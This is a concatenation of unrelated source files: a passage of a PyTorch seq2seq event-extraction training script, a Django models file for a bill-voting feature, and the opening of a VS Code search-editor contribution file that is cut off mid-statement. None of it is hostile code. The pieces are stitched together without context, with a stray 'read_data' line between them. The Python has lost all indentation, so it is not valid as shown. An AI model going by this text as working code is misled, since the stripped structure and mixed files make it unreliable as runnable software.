word_embeds = self.dropout(word_embeds)
return word_embeds
def weight(self):
return self.embeddings.weight
# Potentially use a pretrained BERT - 509
class CharEmbeddings(nn.Module):
def __init__(self, vocab_size, embed_dim, drop_out_rate):
super(CharEmbeddings, self).__init__()
# Layers
self.embeddings = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
self.dropout = nn.Dropout(drop_out_rate)
def forward(self, words_seq):
char_embeds = self.embeddings(words_seq)
char_embeds = self.dropout(char_embeds)
return char_embeds
# DONT CHANGE CLASSES
# 543
class Encoder(nn.Module):
def __init__(self, input_dim, hidden_dim, layers, is_bidirectional, drop_out_rate):
super(Encoder, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.layers = layers
self.is_bidirectional = is_bidirectional
self.drop_rate = drop_out_rate
self.char_embeddings = CharEmbeddings(len(char_vocab), char_embed_dim, drop_rate)
# Remove in case we want to use BERT
self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.layers, batch_first=True,
bidirectional=self.is_bidirectional)
self.dropout = nn.Dropout(self.drop_rate)
self.conv1d = nn.Conv1d(char_embed_dim, char_feature_size, conv_filter_size)
self.max_pool = nn.MaxPool1d(max_word_len + conv_filter_size - 1, max_word_len + conv_filter_size - 1)
def forward(self, words_input, char_seq, adj, is_training=False):
char_embeds = self.char_embeddings(char_seq)
char_embeds = char_embeds.permute(0, 2, 1)
char_feature = torch.tanh(self.max_pool(self.conv1d(char_embeds)))
char_feature = char_feature.permute(0, 2, 1)
words_input = torch.cat((words_input, char_feature), -1)
outputs, hc = self.lstm(words_input)
outputs = self.dropout(outputs)
return outputs
# 597
class Attention(nn.Module):
def __init__(self, input_dim):
super(Attention, self).__init__()
self.input_dim = input_dim
self.linear_ctx = nn.Linear(self.input_dim, self.input_dim, bias=False)
self.linear_query = nn.Linear(self.input_dim, self.input_dim, bias=True)
self.v = nn.Linear(self.input_dim, 1)
def forward(self, s_prev, enc_hs, src_mask):
uh = self.linear_ctx(enc_hs)
wq = self.linear_query(s_prev)
wquh = torch.tanh(wq + uh)
attn_weights = self.v(wquh).squeeze()
attn_weights.data.masked_fill_(src_mask.data, -float('inf'))
attn_weights = F.softmax(attn_weights, dim=-1)
ctx = torch.bmm(attn_weights.unsqueeze(1), enc_hs).squeeze()
return ctx, attn_weights
# 617
class NGram_Attention(nn.Module):
def __init__(self, input_dim, N):
super(NGram_Attention, self).__init__()
self.input_dim = input_dim
self.layers = N
self.V_layers = nn.ModuleList()
self.W_layers = nn.ModuleList()
for i in range(N):
self.V_layers.append(nn.Linear(input_dim, input_dim))
self.W_layers.append(nn.Linear(input_dim, input_dim))
def forward(self, s_prev, enc_hs, src_mask):
att = torch.bmm(s_prev.unsqueeze(1), self.V_layers[0](enc_hs).transpose(1, 2)).squeeze()
att.data.masked_fill_(src_mask.data, -float('inf'))
att = F.softmax(att, dim=-1)
ctx = self.W_layers[0](torch.bmm(att.unsqueeze(1), enc_hs).squeeze())
for i in range(1, self.layers):
enc_hs_ngram = torch.nn.AvgPool1d(i+1, 1)(enc_hs.transpose(1, 2)).transpose(1, 2)
n_mask = src_mask.unsqueeze(1).float()
n_mask = torch.nn.AvgPool1d(i+1, 1)(n_mask).squeeze()
n_mask[n_mask > 0] = 1
n_mask = n_mask.byte()
n_att = torch.bmm(s_prev.unsqueeze(1), self.V_layers[i](enc_hs_ngram).transpose(1, 2)).squeeze()
n_att.data.masked_fill_(n_mask.data, -float('inf'))
n_att = F.softmax(n_att, dim=-1)
ctx += self.W_layers[i](torch.bmm(n_att.unsqueeze(1), enc_hs_ngram).squeeze())
return ctx, att
# 588
def mean_over_time(x, mask):
x.data.masked_fill_(mask.unsqueeze(2).data, 0)
x = torch.sum(x, dim=1)
time_steps = torch.sum(mask.eq(0), dim=1, keepdim=True).float()
x /= time_steps
return x
# 645
class Decoder(nn.Module):
def __init__(self, input_dim, hidden_dim, layers, drop_out_rate, max_length):
super(Decoder, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.layers = layers
self.drop_rate = drop_out_rate
self.max_length = max_length
if att_type == 'None':
self.lstm = nn.LSTMCell(2 * self.input_dim, self.hidden_dim, self.layers)
elif att_type == 'Unigram':
self.attention = Attention(input_dim)
self.lstm = nn.LSTMCell(2 * self.input_dim, self.hidden_dim, self.layers)
else:
self.attention = NGram_Attention(input_dim, 3)
self.lstm = nn.LSTMCell(3 * self.input_dim, self.hidden_dim, self.layers)
self.dropout = nn.Dropout(self.drop_rate)
self.ent_out = nn.Linear(self.input_dim, len(word_vocab))
def forward(self, y_prev, h_prev, enc_hs, src_word_embeds, src_mask, is_training=False):
src_time_steps = enc_hs.size()[1]
if att_type == 'None':
ctx = mean_over_time(enc_hs, src_mask)
attn_weights = torch.zeros(src_mask.size()).cuda()
elif att_type == 'Unigram':
s_prev = h_prev[0]
s_prev = s_prev.unsqueeze(1)
s_prev = s_prev.repeat(1, src_time_steps, 1)
ctx, attn_weights = self.attention(s_prev, enc_hs, src_mask)
else:
last_index = src_mask.size()[1] - torch.sum(src_mask, dim=-1).long() - 1
last_index = last_index.unsqueeze(1).unsqueeze(1).repeat(1, 1, enc_hs.size()[-1])
enc_last = torch.gather(enc_hs, 1, last_index).squeeze()
ctx, attn_weights = self.attention(enc_last, src_word_embeds, src_mask)
ctx = torch.cat((enc_last, ctx), -1)
y_prev = y_prev.squeeze()
s_cur = torch.cat((y_prev, ctx), 1)
hidden, cell_state = self.lstm(s_cur, h_prev)
hidden = self.dropout(hidden)
output = self.ent_out(hidden)
return output, (hidden, cell_state), attn_weights
# 690
class SeqToSeqModel(nn.Module):
def __init__(self):
super(SeqToSeqModel, self).__init__()
self.word_embeddings = WordEmbeddings(len(word_vocab), word_embed_dim, word_embed_matrix, drop_rate)
self.encoder = Encoder(enc_inp_size, int(enc_hidden_size/2), layers, True, drop_rate)
self.decoder = Decoder(dec_inp_size, dec_hidden_size, layers, drop_rate, max_trg_len)
def forward(self, src_words_seq, src_chars_seq, src_mask, trg_words_seq, trg_vocab_mask, adj, is_training=False):
src_word_embeds = self.word_embeddings(src_words_seq)
trg_word_embeds = self.word_embeddings(trg_words_seq)
batch_len = src_word_embeds.size()[0]
if is_training:
time_steps = trg_word_embeds.size()[1] - 1
else:
time_steps = max_trg_len
encoder_output = self.encoder(src_word_embeds, src_chars_seq, adj, is_training)
h0 = autograd.Variable(torch.FloatTensor(torch.zeros(batch_len, word_embed_dim)))
h0 = h0.cuda()
c0 = autograd.Variable(torch.FloatTensor(torch.zeros(batch_len, word_embed_dim)))
c0 = c0.cuda()
dec_hid = (h0, c0)
if is_training:
dec_inp = trg_word_embeds[:, 0, :]
dec_out, dec_hid, dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
dec_out = dec_out.view(-1, len(word_vocab))
dec_out = F.log_softmax(dec_out, dim=-1)
dec_out = dec_out.unsqueeze(1)
for t in range(1, time_steps):
dec_inp = trg_word_embeds[:, t, :]
cur_dec_out, dec_hid, dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
cur_dec_out = cur_dec_out.view(-1, len(word_vocab))
dec_out = torch.cat((dec_out, F.log_softmax(cur_dec_out, dim=-1).unsqueeze(1)), 1)
else:
dec_inp = trg_word_embeds[:, 0, :]
dec_out, dec_hid, dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
dec_out = dec_out.view(-1, len(word_vocab))
if copy_on:
dec_out.data.masked_fill_(trg_vocab_mask.data, -float('inf'))
dec_out = F.log_softmax(dec_out, dim=-1)
topv, topi = dec_out.topk(1)
dec_out_v, dec_out_i = dec_out.topk(1)
dec_attn_v, dec_attn_i = dec_attn.topk(1)
for t in range(1, time_steps):
dec_inp = self.word_embeddings(topi.squeeze().detach())
cur_dec_out, dec_hid, cur_dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
cur_dec_out = cur_dec_out.view(-1, len(word_vocab))
if copy_on:
cur_dec_out.data.masked_fill_(trg_vocab_mask.data, -float('inf'))
cur_dec_out = F.log_softmax(cur_dec_out, dim=-1)
topv, topi = cur_dec_out.topk(1)
cur_dec_out_v, cur_dec_out_i = cur_dec_out.topk(1)
dec_out_i = torch.cat((dec_out_i, cur_dec_out_i), 1)
cur_dec_attn_v, cur_dec_attn_i = cur_dec_attn.topk(1)
dec_attn_i = torch.cat((dec_attn_i, cur_dec_attn_i), 1)
if is_training:
dec_out = dec_out.view(-1, len(word_vocab))
return dec_out
else:
return dec_out_i, dec_attn_i
def predict(samples, model, model_id):
pred_batch_size = batch_size
batch_count = math.ceil(len(samples) / pred_batch_size)
move_last_batch = False
if len(samples) - batch_size * (batch_count - 1) == 1:
move_last_batch = True
batch_count -= 1
preds = list()
attns = list()
model.eval()
set_random_seeds(random_seed)
start_time = datetime.datetime.now()
for batch_idx in tqdm(range(0, batch_count)):
batch_start = batch_idx * pred_batch_size
batch_end = min(len(samples), batch_start + pred_batch_size)
if batch_idx == batch_count - 1 and move_last_batch:
batch_end = len(samples)
cur_batch = samples[batch_start:batch_end]
cur_samples_input = get_batch_data(cur_batch, False)
src_words_seq = torch.from_numpy(cur_samples_input['src_words'].astype('long'))
src_words_mask = torch.from_numpy(cur_samples_input['src_words_mask'].astype('uint8'))
trg_vocab_mask = torch.from_numpy(cur_samples_input['trg_vocab_mask'].astype('uint8'))
trg_words_seq = torch.from_numpy(cur_samples_input['trg_words'].astype('long'))
adj = torch.from_numpy(cur_samples_input['adj'].astype('float32'))
src_chars_seq = torch.from_numpy(cur_samples_input['src_chars'].astype('long'))
if torch.cuda.is_available():
src_words_seq = src_words_seq.cuda()
src_words_mask = src_words_mask.cuda()
trg_vocab_mask = trg_vocab_mask.cuda()
trg_words_seq = trg_words_seq.cuda()
adj = adj.cuda()
src_chars_seq = src_chars_seq.cuda()
src_words_seq = autograd.Variable(src_words_seq)
src_words_mask = autograd.Variable(src_words_mask)
trg_vocab_mask = autograd.Variable(trg_vocab_mask)
adj = autograd.Variable(adj)
src_chars_seq = autograd.Variable(src_chars_seq)
trg_words_seq = autograd.Variable(trg_words_seq)
with torch.no_grad():
outputs = model(src_words_seq, src_chars_seq, src_words_mask, trg_words_seq, trg_vocab_mask, adj,False)
preds += list(outputs[0].data.cpu().numpy())
attns += list(outputs[1].data.cpu().numpy())
model.zero_grad()
end_time = datetime.datetime.now()
custom_print('Prediction time:', end_time - start_time)
return preds, attns
def train_model(model_id, train_samples, dev_samples, best_model_file):
train_size = len(train_samples)
batch_count = int(math.ceil(train_size/batch_size))
move_last_batch = False
if len(train_samples) - batch_size * (batch_count - 1) == 1:
move_last_batch = True
batch_count -= 1
custom_print(batch_count)
# model = get_model(model_id)
model = SeqToSeqModel()
pytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
custom_print('Parameters size:', pytorch_total_params)
custom_print(model)
if torch.cuda.is_available():
model.cuda()
if n_gpu > 1:
model = torch.nn.DataParallel(model)
criterion = nn.NLLLoss(ignore_index=0)
optimizer = optim.Adam(model.parameters())
custom_print(optimizer)
best_dev_acc = -1.0
best_epoch_idx = -1
best_epoch_seed = -1
for epoch_idx in range(0, num_epoch):
model.train()
model.zero_grad()
custom_print('Epoch:', epoch_idx + 1)
cur_seed = random_seed + epoch_idx + 1
set_random_seeds(cur_seed)
cur_shuffled_train_data = shuffle_data(train_samples)
start_time = datetime.datetime.now()
train_loss_val = 0.0
for batch_idx in tqdm(range(0, batch_count)):
batch_start = batch_idx * batch_size
batch_end = min(len(cur_shuffled_train_data), batch_start + batch_size)
if batch_idx == batch_count - 1 and move_last_batch:
batch_end = len(cur_shuffled_train_data)
cur_batch = cur_shuffled_train_data[batch_start:batch_end]
cur_samples_input = get_batch_data(cur_batch, True)
# np arrays to tensors
src_words_seq = torch.from_numpy(cur_samples_input['src_words'].astype('long'))
src_words_mask = torch.from_numpy(cur_samples_input['src_words_mask'].astype('uint8'))
trg_vocab_mask = torch.from_numpy(cur_samples_input['trg_vocab_mask'].astype('uint8'))
trg_words_seq = torch.from_numpy(cur_samples_input['trg_words'].astype('long'))
adj = torch.from_numpy(cur_samples_input['adj'].astype('float32'))
src_chars_seq = torch.from_numpy(cur_samples_input['src_chars'].astype('long'))
target = torch.from_numpy(cur_samples_input['target'].astype('long'))
if torch.cuda.is_available():
src_words_seq = src_words_seq.cuda()
src_words_mask = src_words_mask.cuda()
trg_vocab_mask = trg_vocab_mask.cuda()
trg_words_seq = trg_words_seq.cuda()
adj = adj.cuda()
src_chars_seq = src_chars_seq.cuda()
target = target.cuda()
src_words_seq = autograd.Variable(src_words_seq)
src_words_mask = autograd.Variable(src_words_mask)
trg_vocab_mask = autograd.Variable(trg_vocab_mask)
trg_words_seq = autograd.Variable(trg_words_seq)
adj = autograd.Variable(adj)
src_chars_seq = autograd.Variable(src_chars_seq)
target = autograd.Variable(target)
outputs = model(src_words_seq, src_chars_seq, src_words_mask, trg_words_seq, trg_vocab_mask, adj, True)
target = target.view(-1, 1).squeeze()
loss = criterion(outputs, target)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 10.0)
if (batch_idx + 1) % update_freq == 0:
optimizer.step()
model.zero_grad()
train_loss_val += loss.item()
train_loss_val /= batch_count
end_time = datetime.datetime.now()
custom_print('Training loss:', train_loss_val)
custom_print('Training time:', end_time - start_time)
custom_print('\nDev Results\n')
set_random_seeds(random_seed)
dev_preds, dev_attns = predict(dev_samples, model, model_id)
write_test_res(dev_samples, dev_preds, dev_attns, os.path.join(trg_data_folder, 'dev.out'))
ref_lines = open(trg_dev_file).read().splitlines()
pred_lines = open(os.path.join(trg_data_folder, 'dev.out')).read().splitlines()
event_lines = open(events_file).read().splitlines()
argument_lines = open(arguments_file).read().splitlines()
roles_lines = open(roles_file).read().splitlines()
dev_acc = calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines)
# pred_pos, gt_pos, correct_pos = get_F1(dev_samples, dev_preds, dev_attns)
# custom_print(pred_pos, '\t', gt_pos, '\t', correct_pos)
# p = float(correct_pos) / (pred_pos + 1e-8)
# r = float(correct_pos) / (gt_pos + 1e-8)
# dev_acc = (2 * p * r) / (p + r + 1e-8)
# custom_print('F1:', dev_acc)
if dev_acc >= best_dev_acc:
best_epoch_idx = epoch_idx + 1
best_epoch_seed = cur_seed
custom_print('model saved......')
best_dev_acc = dev_acc
torch.save(model.state_dict(), best_model_file)
custom_print('\n\n')
if epoch_idx + 1 - best_epoch_idx >= early_stop_cnt:
break
custom_print('*******')
custom_print('Best Epoch:', best_epoch_idx)
custom_print('Best Epoch Seed:', best_epoch_seed)
if __name__ == "__main__":
os.environ['CUDA_VISIBLE_DEVICES'] = sys.argv[1]
random_seed = int(sys.argv[2])
src_data_folder = sys.argv[3]
trg_data_folder = sys.argv[4]
job_mode = sys.argv[5]
embedding_type = sys.argv[6]
granular_mode = 1
n_gpu = torch.cuda.device_count()
set_random_seeds(random_seed)
if not os.path.exists(trg_data_folder):
os.mkdir(trg_data_folder)
model_name = 1
#Tunable Hyperparameters
batch_size = 32
num_epoch = 30
max_src_len = 100
max_trg_len = 50
if embedding_type == 'w2v':
embedding_file = os.path.join(src_data_folder, 'w2v.txt')
else:
embedding_file = os.path.join(src_data_folder, 'Bert_embeddings.txt')
update_freq = 1
enc_type = ['LSTM', 'GCN', 'LSTM-GCN'][0]
att_type = ['None', 'Unigram', 'N-Gram-Enc'][1]
copy_on = True
gcn_num_layers = 3
if embedding_type == 'w2v':
word_embed_dim = 300
else:
word_embed_dim = 768
word_min_freq = 2
char_embed_dim = 50
char_feature_size = 50
conv_filter_size = 3
max_word_len = 10
enc_inp_size = word_embed_dim + char_feature_size
enc_hidden_size = word_embed_dim
dec_inp_size = enc_hidden_size
dec_hidden_size = dec_inp_size
drop_rate = 0.3
layers = 1
early_stop_cnt = 20
sample_cnt = 0
Sample = recordclass("Sample", "Id SrcLen SrcWords TrgLen TrgWords")
events_file = os.path.join(src_data_folder, 'event_types.txt')
arguments_file = os.path.join(src_data_folder, 'arguments.txt')
roles_file = os.path.join(src_data_folder, 'roles.txt')
events = get_relations(events_file)
arguments = get_relations(arguments_file)
roles = get_relations(roles_file)
# train a model
if job_mode == 'train':
logger = open(os.path.join(trg_data_folder, 'training.log'), 'w')
custom_print(sys.argv)
custom_print(max_src_len, max_trg_len, drop_rate, layers)
custom_print('loading data......')
model_file_name = os.path.join(trg_data_folder, 'model.h5py')
src_train_file = os.path.join(src_data_folder, 'train.sent')
trg_train_file = os.path.join(src_data_folder, 'train.tup')
train_data = read_data(src_train_file, trg_train_file, 1)
src_dev_file = os.path.join(src_data_folder, 'dev.sent')
trg_dev_file = os.path.join(src_data_folder, 'dev.tup')
dev_data = read_data(src_dev_file, trg_dev_file, 2)
custom_print('Training data size:', len(train_data))
custom_print('Development data size:', len(dev_data))
custom_print("preparing vocabulary......")
save_vocab = os.path.join(trg_data_folder, 'vocab.pkl')
word_vocab, rev_word_vocab, char_vocab, word_embed_matrix = build_vocab(train_data, events, arguments, roles, save_vocab,
embedding_file)
custom_print("Training started......")
train_model(model_name, train_data, dev_data, model_file_name)
logger.close()
if job_mode == 'test':
logger = open(os.path.join(trg_data_folder, 'test.log'), 'w')
custom_print(sys.argv)
custom_print("loading word vectors......")
vocab_file_name = os.path.join(trg_data_folder, 'vocab.pkl')
word_vocab, char_vocab = load_vocab(vocab_file_name)
rev_word_vocab = OrderedDict()
for word in word_vocab:
idx = word_vocab[word]
rev_word_vocab[idx] = word
word_embed_matrix = np.zeros((len(word_vocab), word_embed_dim), dtype=np.float32)
custom_print('vocab size:', len(word_vocab))
src_test_file = os.path.join(src_data_folder, 'test.sent')
trg_test_file = os.path.join(src_data_folder, 'test.tup')
test_data = read_data(src_test_file, trg_test_file, 3)
custom_print('Test data size:', len(test_data))
custom_print('seed:', random_seed)
model_file = os.path.join(trg_data_folder, 'model.h5py')
best_model = get_model(model_name)
custom_print(best_model)
if torch.cuda.is_available():
best_model.cuda()
if n_gpu > 1:
best_model = torch.nn.DataParallel(best_model)
best_model.load_state_dict(torch.load(model_file))
custom_print('\nTest Results\n')
set_random_seeds(random_seed)
test_preds, test_attns = predict(test_data, best_model, model_name)
custom_print('Copy On')
write_test_res(test_data, test_preds, test_attns, os.path.join(trg_data_folder, 'test.out'))
# ref_lines = open(trg_test_file).readlines()
# pred_lines = open(os.path.join(trg_data_folder, 'test.out')).readlines()
# event_lines = open(events_file).readlines()
# argument_lines = open(arguments_file).readlines()
# roles_lines = open(roles_file).readlines()
ref_lines = open(trg_test_file).read().splitlines()
pred_lines = open(os.path.join(trg_data_folder, 'test.out')).read().splitlines()
event_lines = open(events_file).read().splitlines()
argument_lines = open(arguments_file).read().splitlines()
roles_lines = open(roles_file).read().splitlines()
mode = 1
custom_print('Overall F1')
# custom_print(cal_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines, mode))
calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines)
copy_on = False
custom_print('Copy Off')
set_random_seeds(random_seed)
test_preds, test_attns = predict(test_data, best_model, model_name)
write_test_res(test_data, test_preds, test_attns, os.path.join(trg_data_folder, 'test_without_copy.out'))
# ref_lines = open(trg_test_file).readlines()
# pred_lines = open(os.path.join(trg_data_folder, 'test_without_copy.out')).readlines()
# event_lines = open(events_file).readlines()
# argument_lines = open(arguments_file).readlines()
# roles_lines = open(roles_file).readlines()
ref_lines = open(trg_test_file).read().splitlines()
pred_lines = open(os.path.join(trg_data_folder, 'test_without_copy.out')).read().splitlines()
event_lines = open(events_file).read().splitlines()
argument_lines = open(arguments_file).read().splitlines()
roles_lines = open(roles_file).read().splitlines()
mode = 1
custom_print('Overall F1')
# custom_print(cal_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines, mode))
calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines)
logger.close()
read_data
models.py
import smart_imports
smart_imports.all()
class Bill(django_models.Model):
CAPTION_MIN_LENGTH = 6
CAPTION_MAX_LENGTH = 256
created_at = django_models.DateTimeField(auto_now_add=True, null=False)
updated_at = django_models.DateTimeField(auto_now_add=True, null=False) # MUST be set up by hand
voting_end_at = django_models.DateTimeField(null=True, blank=True)
created_at_turn = django_models.IntegerField(null=False)
applyed_at_turn = django_models.IntegerField(null=True, blank=True)
ended_at = django_models.DateTimeField(null=True, blank=True)
owner = django_models.ForeignKey('accounts.Account', null=True, related_name='+', on_delete=django_models.SET_NULL)
caption = django_models.CharField(max_length=CAPTION_MAX_LENGTH)
type = rels_django.RelationIntegerField(relation=relations.BILL_TYPE, db_index=True)
state = rels_django.RelationIntegerField(relation=relations.BILL_STATE, db_index=True)
approved_by_moderator = django_models.BooleanField(default=False, db_index=True)
remove_initiator = django_models.ForeignKey('accounts.Account', null=True, blank=True, related_name='+', on_delete=django_models.SET_NULL)
technical_data = django_models.TextField(null=False, blank=True, default={})
chronicle_on_accepted = django_models.TextField(null=False, blank=True, default='')
# we should not remove the bill when the forum thread is accidentally removed
forum_thread = django_models.ForeignKey(forum_models.Thread, null=True, blank=True, related_name='+', on_delete=django_models.SET_NULL)
votes_for = django_models.IntegerField(default=0)
votes_against = django_models.IntegerField(default=0)
votes_refrained = django_models.IntegerField(default=0)
# fields to store config values after processing state (since they can be changed in future)
min_votes_percents_required = django_models.FloatField(default=0.0)
is_declined = django_models.BooleanField(blank=True, default=False)
declined_by = django_models.ForeignKey('bills.Bill', null=True, default=None, related_name='+', blank=True, on_delete=django_models.SET_NULL)
depends_on = django_models.ForeignKey('bills.Bill', null=True, default=None, related_name='+', blank=True, on_delete=django_models.SET_NULL)
def __str__(self):
return '{}-{}'.format(self.id, self.caption)
class Meta:
permissions = (("moderate_bill", "Может администрировать записи в Книге Судеб"), )
class Actor(django_models.Model):
# ATTENTION: if you want to make a building an actor, remember that after it is recreated
# (for the same person, after the previous building has been destroyed)
# it is first fully removed from the database (the previous building) and only then created
created_at = django_models.DateTimeField(auto_now_add=True, null=False)
bill = django_models.ForeignKey(Bill, null=False, on_delete=django_models.CASCADE)
place = django_models.ForeignKey('places.Place', null=True, related_name='+', on_delete=django_models.CASCADE)
class Vote(django_models.Model):
created_at = django_models.DateTimeField(auto_now_add=True, null=False)
owner = django_models.ForeignKey('accounts.Account', null=True, related_name='+', on_delete=django_models.SET_NULL)
bill = django_models.ForeignKey(Bill, null=False, on_delete=django_models.CASCADE)
type = rels_django.RelationIntegerField(relation=relations.VOTE_TYPE, db_index=True)
class Meta:
unique_together = (('owner', 'bill'),)
searchEditor.contribution.ts
/*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { KeyCode, KeyMod } from 'vs/base/common/keyCodes';
import * as objects from 'vs/base/common/objects';
import { extname } from 'vs/base/common/resources';
import { URI } from 'vs/base/common/uri';
import { ServicesAccessor } from 'vs/editor/browser/editorExtensions';
import { Range } from 'vs/editor/common/core/range';
import { ToggleCaseSensitiveKeybinding, ToggleRegexKeybinding, ToggleWholeWordKeybinding } from 'vs/editor/contrib/find/findModel';
import { localize } from 'vs/nls';
import { Action2, MenuId, registerAction2 } from 'vs/platform/actions/common/actions';
import { CommandsRegistry } from 'vs/platform/commands/common/commands';
import { ContextKeyExpr, IContextKeyService } from 'vs/platform/contextkey/common/contextkey';
import { SyncDescriptor } from 'vs/platform/instantiation/common/descriptors';
import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation';
import { KeybindingsRegistry, KeybindingWeight } from 'vs/platform/keybinding/common/keybindingsRegistry';
import { LifecyclePhase } from 'vs/platform/lifecycle/common/lifecycle';
import { Registry } from 'vs/platform/registry/common/platform';
import { ITelemetryService } from 'vs/platform/telemetry/common/telemetry';
import { EditorDescriptor, Extensions as EditorExtensions, IEditorRegistry } from 'vs/workbench/browser/editor';
import { Extensions as WorkbenchExtensions, IWorkbenchContribution, IWorkbenchContributionsRegistry } from 'vs/workbench/common/contributions';
import { ActiveEditorContext, Extensions as EditorInputExtensions, IEditorInputFactory, IEditorInputFactoryRegistry } from 'vs/workbench/common/editor';
import { IViewsService } from 'vs/workbench/common/views';
import { getSearchView } from 'vs/workbench/contrib/search/browser/searchActions';
import { searchRefreshIcon } from 'vs/workbench/contrib/search/browser/searchIcons';
import * as SearchConstants from 'vs/workbench/contrib/search/common/constants';
import * as SearchEditorConstants from 'vs/workbench/contrib/searchEditor/browser/constants';
import { SearchEditor } from 'vs/workbench/contrib/searchEditor/browser/searchEditor';
import { createEditorFromSearchResult, modifySearchEditorContextLinesCommand, openNewSearchEditor, selectAllSearchEditorMatchesCommand, toggleSearchEditorCaseSensitiveCommand, toggleSearchEditorContextLinesCommand, toggleSearchEditorRegexCommand, toggleSearchEditorWholeWordCommand } from 'vs/workbench/contrib/searchEditor/browser/searchEditorActions';
import { getOrMakeSearchEditorInput, SearchConfiguration, SearchEditorInput, SEARCH_EDITOR_EXT } from 'vs/workbench/contrib/searchEditor/browser/searchEditorInput';
import { parseSavedSearchEditor } from 'vs/workbench/contrib/searchEditor/browser/searchEditorSerialization';
import { IEditorService } from 'vs/workbench/services/editor/common/editorService';
const OpenInEditorCommandId = 'search.action.openInEditor';
const OpenNewEditorToSideCommandId = 'search.action.openNewEditorToSide';
const FocusQueryEditorWidgetCommandId = 'search.action.focusQueryEditorWidget';
const ToggleSearchEditorCaseSensitiveCommandId = 'toggleSearchEditorCaseSensitive';
const ToggleSearchEditorWholeWordCommandId = 'toggleSearchEditorWholeWord';
const ToggleSearchEditorRegexCommandId = 'toggleSearchEditorRegex';
const ToggleSearchEditorContextLinesCommandId = 'toggleSearchEditorContextLines';
const IncreaseSearchEditorContextLinesCommandId = 'increaseSearchEditorContextLines';
const DecreaseSearchEditorContextLinesCommandId = 'decreaseSearchEditorContextLines';
const RerunSearchEditorSearchCommandId = 'rerunSearchEditorSearch';
const CleanSearchEditorStateCommandId = 'cleanSearchEditorState';
const SelectAllSearchEditorMatchesCommandId = 'selectAllSearchEditorMatches';
//#region Editor Descriptor
Registry.as<IEditorRegistry>(EditorExtensions.Editors).registerEditor(
EditorDescriptor.create(
SearchEditor,
SearchEditor.ID,
localize('searchEditor', "Search Editor")
),
[
new SyncDescriptor(SearchEditorInput)
]
);
//#endregion
//#region Startup Contribution
class SearchEditorContribution implements IWorkbenchContribution {
constructor(
@IEditorService private readonly editorService: IEditorService,
@IInstantiationService protected readonly instantiationService: IInstantiationService,
@ITelemetryService protected readonly telemetryService: ITelemetryService,
@IContextKeyService protected readonly contextKeyService: IContextKeyService,
) {
this.editorService.overrideOpenEditor({
open: (editor, options, group) => {
const resource = editor.resource;
if (!resource) { return undefined; }
if (extname(resource) !== SEARCH_EDITOR_EXT) {
return undefined;
}
if (editor instanceof SearchEditorInput && group.isOpened(editor)) {
return undefined;
}
this.telemetryService.publicLog2('searchEditor/openSavedSearchEditor');
return {
override: (async () => {
const { config } = await instantiationService.invokeFunction(parseSavedSearchEditor, resource);
const input = instantiationService.invokeFunction(getOrMakeSearchEditorInput, { backingUri: resource, config });
return editorService.openEditor(input, { ...options, override: false }, group);
})()
};
}
});
}
}
const workbenchContributionsRegistry = Registry.as<IWorkbenchContributionsRegistry>(WorkbenchExtensions.Workbench);
workbenchContributionsRegistry.registerWorkbenchContribution(SearchEditorContribution, LifecyclePhase.Starting);
//#endregion
//#region Input Factory
type SerializedSearchEditor = { modelUri: string, dirty: boolean, config: SearchConfiguration, name: string, matchRanges: Range[], backingUri: string };
class SearchEditorInputFactory implements IEditorInputFactory {
canSerialize(input: SearchEditorInput) {
return !input.isDisposed();
}
serialize(input: SearchEditorInput) {
let modelUri = undefined;
if (input.modelUri.path || input.modelUri.fragment) {
modelUri = input.modelUri.toString();
}
if (!modelUri) { return undefined; }
const config = input.config;
const dirty = input.isDirty();
const matchRanges = input.getMatchRanges();
const backingUri = input.backingUri;
return JSON.stringify({ modelUri: modelUri.toString(), dirty, config, name: input.getName(), matchRanges, backingUri: backingUri?.toString() } as SerializedSearchEditor);
}
deserialize(instantiationService: IInstantiationService, serializedEditorInput: string): SearchEditorInput | undefined {
const { modelUri, dirty, config, matchRanges, backingUri } = JSON.parse(serializedEditorInput) as SerializedSearchEditor;
if (config && (config.query !== undefined) && (modelUri !== undefined)) {
const input = instantiationService.invokeFunction(getOrMakeSearchEditorInput, { config, modelUri: URI.parse(modelUri), backingUri: backingUri ? URI.parse(backingUri) : undefined });
input.setDirty(dirty);
input.setMatchRanges(matchRanges);
return input;
}
return undefined;
}
}
Registry.as<IEditorInputFactoryRegistry>(EditorInputExtensions.EditorInputFactories).registerEditorInputFactory(
SearchEditorInput.ID,
SearchEditorInputFactory);
//#endregion
//#region Commands
KeybindingsRegistry.registerCommandAndKeybindingRule(objects.assign({
id: ToggleSearchEditorCaseSensitiveCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor, SearchConstants.SearchInputBoxFocusedKey),
handler: toggleSearchEditorCaseSensitiveCommand
}, ToggleCaseSensitiveKeybinding));
KeybindingsRegistry.registerCommandAndKeybindingRule(objects.assign({
id: ToggleSearchEditorWholeWordCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor, SearchConstants.SearchInputBoxFocusedKey),
handler: toggleSearchEditorWholeWordCommand
}, ToggleWholeWordKeybinding));
KeybindingsRegistry.registerCommandAndKeybindingRule(objects.assign({
id: ToggleSearchEditorRegexCommandId,
weight: KeybindingWeight.WorkbenchContrib,
